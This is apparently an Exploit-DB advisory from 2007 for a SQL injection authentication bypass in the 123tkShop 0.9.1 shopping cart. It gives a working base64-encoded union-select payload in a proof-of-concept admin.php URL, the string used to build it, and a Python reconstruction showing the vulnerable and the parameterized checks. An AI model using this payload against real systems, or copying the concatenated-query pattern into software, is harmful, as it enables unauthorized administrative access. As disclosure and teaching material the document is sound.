Vendor: 123tkShop
By: Michael Brooks
CVSS: 7.5 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: 123tkShop
Affected Version From: 0.9.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Date: 2007

123tkShop SQL Injection Vulnerability

An unauthenticated attacker can gain administrative rights through an authentication bypass in the admin login check. The injection payload is delivered base64-encoded in the admin parameter of admin.php; the vulnerable code is the is_admin function in ./123tkShop/shop/mainfile.php, starting at line 156. Because the parameter is base64-decoded server-side before it reaches the query, the quote characters never pass through magic_quotes_gpc, so that setting offers no protection. The attack also works with register_globals=Off, since mainfile.php (line 42) calls import_request_variables('GPC') itself when register_globals is disabled. Proof-of-concept URL: http://127.0.0.1/123tkShop/shop/admin.php?admin=J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk
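To make the bypass concrete, here is an added illustration that is not code from 123tkShop or from the original advisory: a Python/sqlite3 reconstruction of the check as the advisory describes it, beside a parameterized version, both run against the page's own payload. The parsing of the admin parameter (base64-decode, then split at the first ':' into username and password), the admins table and its column names, and the sample account are all assumptions made for the example; the real mainfile.php may differ in detail.

```python
import base64
import hmac
import sqlite3

# The payload from the advisory. It decodes to "'union select 'password'/* :password".
PAYLOAD = "J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk"

# Constructed sample data (not from the product): one admin account.
ADMIN_ROWS = [("admin", "s3cr3t-not-guessable")]


def make_db():
    """In-memory stand-in for the shop database; table and column names are assumed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    con.executemany("INSERT INTO admins VALUES (?, ?)", ADMIN_ROWS)
    return con


def build_payload(username, password):
    """Mirror of the advisory's print base64_encode("<user>:<pass>") step."""
    return base64.b64encode(f"{username}:{password}".encode()).decode()


def split_admin_param(admin_param):
    """Assumed parsing of the admin parameter: base64-decode, then split at the first ':'."""
    decoded = base64.b64decode(admin_param).decode("utf-8", errors="replace")
    username, _, password = decoded.partition(":")
    return username, password


def injected_sql(admin_param):
    """The statement the vulnerable check ends up sending, for inspection."""
    username, _ = split_admin_param(admin_param)
    return f"SELECT password FROM admins WHERE username='{username}'"


def is_admin_vulnerable(con, admin_param):
    """Reconstruction of the flaw: the decoded username is concatenated straight
    into the SQL string. magic_quotes_gpc cannot help because the quote characters
    only come into existence after base64 decoding, on the server side."""
    _, password = split_admin_param(admin_param)
    row = con.execute(injected_sql(admin_param)).fetchone()
    # The injected UNION makes the query return the attacker-chosen string
    # 'password', which then equals the password half of the same payload.
    return row is not None and row[0] == password


def is_admin_fixed(con, admin_param):
    """Hardened version: bind the username as a query parameter so it can only
    ever be data, and compare the password in constant time."""
    username, password = split_admin_param(admin_param)
    row = con.execute(
        "SELECT password FROM admins WHERE username = ?", (username,)
    ).fetchone()
    return row is not None and hmac.compare_digest(row[0].encode(), password.encode())


if __name__ == "__main__":
    con = make_db()
    print(injected_sql(PAYLOAD))
    print("vulnerable:", is_admin_vulnerable(con, PAYLOAD))  # True
    print("fixed:", is_admin_fixed(con, PAYLOAD))  # False
```

The injected statement becomes SELECT password FROM admins WHERE username=''union select 'password'/* ', so the first SELECT matches nothing and the UNION supplies the literal 'password', which is then compared against the "password" half of the same payload. A real fix should also store password hashes rather than plaintext, but that is separate from the injection itself.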

Mitigation:

No patch exists. The author advises switching to another shopping cart such as OsCommerce.

Exploit-DB raw data:

By Michael Brooks
Vulnerability: SQL Injection
Software:123tkShop
Homepage:http://sourceforge.net/projects/my123tkshop/
Affects Version 0.9.1. 

An attacker can gain Administrative rights with this authentication bypass exploit:
http://127.0.0.1/123tkShop/shop/admin.php?admin=J3VuaW9uIHNlbGVjdCAncGFzc3dvcmQnLyogOnBhc3N3b3Jk
The payload for the attack is constructed like this:
print base64_encode("'union select 'password'/* :password");

Vulnerable code is in the ./123tkShop/shop/mainfile.php file in the is_admin function starting on line 156

The attack will work with magic_quotes_gpc=On or Off because of base64_decode().
The attack will also work with register_globals=Off or On because of mainfile.php line 42:
if (!ini_get("register_globals")) {
    import_request_variables('GPC');
}
Registering globals is dangerous. 

My advice is to use another shopping cart such as OsCommerce. 

An interesting side note is that this url http://127.0.0.1/123tkShop/shop/admin.php?admin=%22 will produce a message:
"I don't like you..."
Interesting sentence; unfortunately for 123tkShop, sentences do not defend against SQL injection.

Merry Christmas. 

# milw0rm.com [2007-12-14]